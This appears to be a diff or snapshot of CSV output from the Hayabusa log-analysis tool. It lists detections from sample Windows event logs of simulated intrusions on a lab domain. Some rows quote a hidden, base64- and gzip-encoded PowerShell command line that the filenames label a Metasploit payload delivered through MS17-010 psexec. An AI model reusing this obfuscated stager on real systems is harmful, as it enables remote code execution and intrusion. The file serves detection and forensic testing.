+2021-04-22 00:13:03.010 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xf24 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:14:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xff8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:15:03.006 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x17f0 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:16:03.002 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:17:03.011 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:18:03.015 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xea4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx
+2021-04-22 00:19:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1228 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx"
+2021-04-22 17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: 0Konuy9q8HtkWeKS | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x74872,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: FS03VULN$ | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\WindowsPowerShell\v1.0\powershell.exe | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: FS03VULN$ | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x3e7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:04.851 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.633 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPg2gWACA7VWbW+bSBD+nEj5D6iyBKiOIbbbvEiVbgFju4kdbBI7sWud1rCGbRbWgSWO0/a/32CgTa/pXXvSIb/sy8zszDPPzrDKYk9QHku+w91M+nSwv+fgBEeSUouy9fqkLtXSsaPu7cFGjXd7+K30TlLmaL22eIRpvDg7M7MkIbEo5o0uEShNSbRklKSKKn2WpiFJyOHl8iPxhPRJqv3Z6DK+xKwU25rYC4l0iGI/37vgHs4darhrRoUif/ggq/PDo0Wjc59hliqyu00FiRo+Y7IqfVHzA6+2a6LIA+olPOUr0ZjSuNVsXMcpXpEhWHsgAyJC7qeyCmHAJyEiS2KpCCi3UOwrMgydhHvI9xOSpnJdmue254vFH8q8PHicxYJGpNGPBUn42iXJA/VI2ujh2GdkTFYL0HJFQuNgoaog9sDviFKLM8bq0u+YUYZkU8H2q0rKcyWQckSi1iGXLwU64H7GSKEqv+BpQQAVnpIEAN6Xg/2D/VXFGc82njMGRnvz3ZiAe4rDU7oTeyfpdWkA52DBky1Ma1dJRtTFV3AhEcGbSf3n+keVMIgKi03PYW0+4dRfgE6Z01rQub/M13/OTYusaEysbYwj6lX0U17CmawY2cXYqMSG4JUilxvEtwgjARY5cHm6f1DrRFR81TUyynySIA9ylYJXkEb1e2eKXChyPx6QCEAq5sC/2gpITyrpkujb6vR8DkKyyXCa1iUng1vn1SWXYEb8uoTilJZbKBN8N5S/uTvImKAeTkVlbqFWOJbnmTxORZJ5kDeI/cpdE49ilkNRl3rUJ8bWpUF1rvwiECZmDK4CWHqARMBKDoArcjYk4OIu82rDJaIfrRmJQGZ3/W2GA7jsJeF39MEB8eW/e1jxuSBvjkUFwjP/IMEu46IuTWgioIrkuO5o9N/Of1ZAdp6YCSlzoVRXZG5sRc7s2qOXU7KEZQdCIgAAO+GRgVPytl1UCuWVdkkdBM+t1XNnfeEO4GvB1+7HbLA6cYTOI9rq84Fnpk7XPkF0E2y8kyHy/Pc+OXUnbeF2+sJ0UG9EdaMdeoZ+tRsHt/QoCJA/HIUe051OdDHsp4/apjfNbRU2vHa7d6OjVqt92dLvALhc5w50Irp5vIAxlMTLC6OfGnqfdd6b4+W0ac+mrKe17XA15an79tbSNO3Ux9Zgi5DB/dZge3M05lc9LzLaMddOzfYd6iBkxp2JbfDzWyNBjjbBwZqboX9sNgMTGbZHyWx0bRujkW2g6+7He+tUC7TT6Q0OjemkSWfrm3EIc3vTG51rervvkyc+2wBwXY5wMAaZwGx64QpkrNfIeD3kaRPfGRwZIGPP7lE3vF3bDoP9q+smRxM2vMHoYra1Ne3o1mmjns6n3QCNQBwHxgij9MF6srSjic/96Zvh7Uqb3LBjzTJHTniTx6yto/x307POvdnRxrs8bhv6vRnRiC2bvnZ6fWLEm/PAeQj80fR4/DjcLuHca02bvMrZBHSqLWfm0npGlJ/V+QFO0hAzIBDU7+rW2jyxy4rscJprKErRze9IEhMGrRCaZcV9xBj38p6QF29oR0WTyHvWNQxbzRdHqvRVUP3WKaqls7MZeAl36dFrXJA4EGFdf2zpOlR9/bGtQ5C/HpfJ11sFDNXznlHgUhhmO8Nqfrlq7Ol/xqq80SH8+f+C1be1f9j9Jfz0ehnvD+vfL/wWnr8f+xRTAaIuVCVGirb4IgQlM569OLAnyPuqfPI3v8tMHA7hbeJg/y89wtRZZwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
+2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
